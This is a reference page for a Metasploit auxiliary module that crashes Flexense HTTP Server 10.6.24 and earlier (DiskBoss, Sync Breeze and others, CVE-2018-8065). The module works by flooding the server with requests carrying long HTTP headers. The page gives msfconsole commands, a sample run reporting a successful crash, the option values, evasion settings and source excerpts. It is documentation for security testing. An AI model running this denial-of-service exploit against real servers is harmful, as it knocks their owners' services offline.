Flexense HTTP Server Denial Of Service - Metasploit
This page contains detailed information about how to use the auxiliary/dos/http/flexense_http_server_dos metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Flexense HTTP Server Denial Of Service
Module: auxiliary/dos/http/flexense_http_server_dos
Source code: modules/auxiliary/dos/http/flexense_http_server_dos.rb
Disclosure date: 2018-03-09
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 80
List of CVEs: CVE-2018-8065
This module triggers a Denial of Service vulnerability in the Flexense HTTP server. Vulnerability caused by a user mode write access memory violation and can be triggered with rapidly sending variety of HTTP requests with long HTTP header values. Multiple Flexense applications that are using Flexense HTTP server 10.6.24 and below vesions reportedly vulnerable.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/dos/http/flexense_http_server_dos
msf auxiliary(flexense_http_server_dos) > show targets
... a list of targets ...
msf auxiliary(flexense_http_server_dos) > set TARGET target-id
msf auxiliary(flexense_http_server_dos) > show options
... show and set options ...
msf auxiliary(flexense_http_server_dos) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.
According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24 Following list of softwares are vulnerable to Denial Of Service. read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065
DiskBoss Enterprise <= v9.0.18 Sync Breeze Enterprise <= v10.6.24 Disk Pulse Enterprise <= v10.6.24 Disk Savvy Enterprise <= v10.6.24 Dup Scout Enterprise <= v10.6.24 VX Search Enterprise <= v10.6.24
Vulnerable Application Link http://www.diskboss.com/downloads.html http://www.syncbreeze.com/downloads.html http://www.diskpulse.com/downloads.html http://www.disksavvy.com/downloads.html http://www.dupscout.com/downloads.html
Installation Setup.
All Flexense applications that are listed above can be installed by following these steps.
Download Application : https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe
And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard
After the installation navigate to: Options->Server
Check the box saying: Enable web server on port:...
Verification Steps
- Install the application
- Start msfconsole
- Do:
use auxiliary/dos/http/flexense_http_server_dos
- Do:
set rport <port>
- Do:
set rhost <ip>
- Do:
check
[+] 192.168.1.20:80 The target is vulnerable.
- Do:
run
- Web server will crash after 200-1000 request depending on the OS version and system memory.
Scenarios
WINDOWS 7/10
msf5 > use auxiliary/dos/http/flexense_http_server_dos
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
rport => 80
msf5 auxiliary(dos/http/flexense_http_server_dos) > run
[*] 192.168.1.20:80 - Triggering the vulnerability
[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the dos/http/flexense_http_server_dos auxiliary module looks in the msfconsole:
msf6 > use auxiliary/dos/http/flexense_http_server_dos
msf6 auxiliary(dos/http/flexense_http_server_dos) > show info
Name: Flexense HTTP Server Denial Of Service
Module: auxiliary/dos/http/flexense_http_server_dos
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2018-03-09
Provided by:
Ege Balci <[email protected]>
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PacketCount 1725 yes The number of packets to be sent (Recommended: Above 1725)
PacketSize 4659 yes The number of bytes in the Accept header (Recommended: 4088-5090
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
Description:
This module triggers a Denial of Service vulnerability in the
Flexense HTTP server. Vulnerability caused by a user mode write
access memory violation and can be triggered with rapidly sending
variety of HTTP requests with long HTTP header values. Multiple
Flexense applications that are using Flexense HTTP server 10.6.24
and below vesions reportedly vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2018-8065
https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS
Module Options
This is a complete list of options available in the dos/http/flexense_http_server_dos auxiliary module:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show options
Module options (auxiliary/dos/http/flexense_http_server_dos):
Name Current Setting Required Description
---- --------------- -------- -----------
PacketCount 1725 yes The number of packets to be sent (Recommended: Above 1725)
PacketSize 4659 yes The number of bytes in the Accept header (Recommended: 4088-5090
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
Advanced Options
Here is a complete list of advanced options supported by the dos/http/flexense_http_server_dos auxiliary module:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show advanced
Module advanced options (auxiliary/dos/http/flexense_http_server_dos):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the dos/http/flexense_http_server_dos module can do:
msf6 auxiliary(dos/http/flexense_http_server_dos) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the dos/http/flexense_http_server_dos auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(dos/http/flexense_http_server_dos) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maxiumum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target refused the connection
Here is a relevant code snippet related to the "Target refused the connection" error message:
44: Exploit::CheckCode::Appears
45: else
46: Exploit::CheckCode::Safe
47: end
48: rescue Rex::ConnectionRefused
49: print_error("Target refused the connection")
50: Exploit::CheckCode::Unknown
51: rescue
52: print_error("Target did not respond to HTTP request")
53: Exploit::CheckCode::Unknown
54: end
Target did not respond to HTTP request
Here is a relevant code snippet related to the "Target did not respond to HTTP request" error message:
47: end
48: rescue Rex::ConnectionRefused
49: print_error("Target refused the connection")
50: Exploit::CheckCode::Unknown
51: rescue
52: print_error("Target did not respond to HTTP request")
53: Exploit::CheckCode::Unknown
54: end
55: end
56:
57: def run
Target is not vulnerable.
Here is a relevant code snippet related to the "Target is not vulnerable." error message:
54: end
55: end
56:
57: def run
58: unless check == Exploit::CheckCode::Appears
59: fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
60: end
61:
62: size = datastore['PacketSize'].to_i
63: print_status("Starting with packets of #{size}-byte strings")
64:
Invalid destination! Continuing...
Here is a relevant code snippet related to the "Invalid destination! Continuing..." error message:
74: sock.put(payload)
75: disconnect
76: count += 1
77: break if count==datastore['PacketCount']
78: rescue ::Rex::InvalidDestination
79: print_error('Invalid destination! Continuing...')
80: rescue ::Rex::ConnectionTimeout
81: print_error('Connection timeout! Continuing...')
82: rescue ::Errno::ECONNRESET
83: print_error('Connection reset! Continuing...')
84: rescue ::Rex::ConnectionRefused
Connection timeout! Continuing...
Here is a relevant code snippet related to the "Connection timeout! Continuing..." error message:
76: count += 1
77: break if count==datastore['PacketCount']
78: rescue ::Rex::InvalidDestination
79: print_error('Invalid destination! Continuing...')
80: rescue ::Rex::ConnectionTimeout
81: print_error('Connection timeout! Continuing...')
82: rescue ::Errno::ECONNRESET
83: print_error('Connection reset! Continuing...')
84: rescue ::Rex::ConnectionRefused
85: print_good("DoS successful after #{count} packets with #{size}-byte headers")
86: return true
Connection reset! Continuing...
Here is a relevant code snippet related to the "Connection reset! Continuing..." error message:
78: rescue ::Rex::InvalidDestination
79: print_error('Invalid destination! Continuing...')
80: rescue ::Rex::ConnectionTimeout
81: print_error('Connection timeout! Continuing...')
82: rescue ::Errno::ECONNRESET
83: print_error('Connection reset! Continuing...')
84: rescue ::Rex::ConnectionRefused
85: print_good("DoS successful after #{count} packets with #{size}-byte headers")
86: return true
87: end
88: end
DoS failed after <COUNT> packets of <SIZE>-byte strings
Here is a relevant code snippet related to the "DoS failed after <COUNT> packets of <SIZE>-byte strings" error message:
81: print_error('Connection timeout! Continuing...')
82: rescue ::Errno::ECONNRESET
83: print_error('Connection reset! Continuing...')
84: rescue ::Rex::ConnectionRefused
85: print_good("DoS successful after #{count} packets with #{size}-byte headers")
86: return true
87: end
88: end
89: print_error("DoS failed after #{count} packets of #{size}-byte strings")
90: end
91: end
Go back to menu.
Related Pull Requests
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #9701 Merged Pull Request: Flexense HTTP Server <= 10.6.24 DOS
References
See Also
Check also the following modules related to this module:
- auxiliary/dos/http/3com_superstack_switch
- auxiliary/dos/http/apache_commons_fileupload_dos
- auxiliary/dos/http/apache_mod_isapi
- auxiliary/dos/http/apache_range_dos
- auxiliary/dos/http/apache_tomcat_transfer_encoding
- auxiliary/dos/http/brother_debut_dos
- auxiliary/dos/http/cable_haunt_websocket_dos
- auxiliary/dos/http/canon_wireless_printer
- auxiliary/dos/http/dell_openmanage_post
- auxiliary/dos/http/f5_bigip_apm_max_sessions
- auxiliary/dos/http/gzip_bomb_dos
- auxiliary/dos/http/hashcollision_dos
- auxiliary/dos/http/ibm_lotus_notes
- auxiliary/dos/http/ibm_lotus_notes2
- auxiliary/dos/http/marked_redos
- auxiliary/dos/http/metasploit_httphandler_dos
- auxiliary/dos/http/monkey_headers
- auxiliary/dos/http/ms15_034_ulonglongadd
- auxiliary/dos/http/nodejs_pipelining
- auxiliary/dos/http/novell_file_reporter_heap_bof
- auxiliary/dos/http/rails_action_view
- auxiliary/dos/http/rails_json_float_dos
- auxiliary/dos/http/slowloris
- auxiliary/dos/http/sonicwall_ssl_format
- auxiliary/dos/http/squid_range_dos
- auxiliary/dos/http/tautulli_shutdown_exec
- auxiliary/dos/http/ua_parser_js_redos
- auxiliary/dos/http/webkitplus
- auxiliary/dos/http/webrick_regex
- auxiliary/dos/http/wordpress_directory_traversal_dos
- auxiliary/dos/http/wordpress_long_password_dos
- auxiliary/dos/http/wordpress_xmlrpc_dos
- auxiliary/dos/http/ws_dos
- auxiliary/dos/scada/igss9_dataserver
- auxiliary/dos/windows/ftp/filezilla_server_port
Authors
- Ege Balci <[email protected]>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.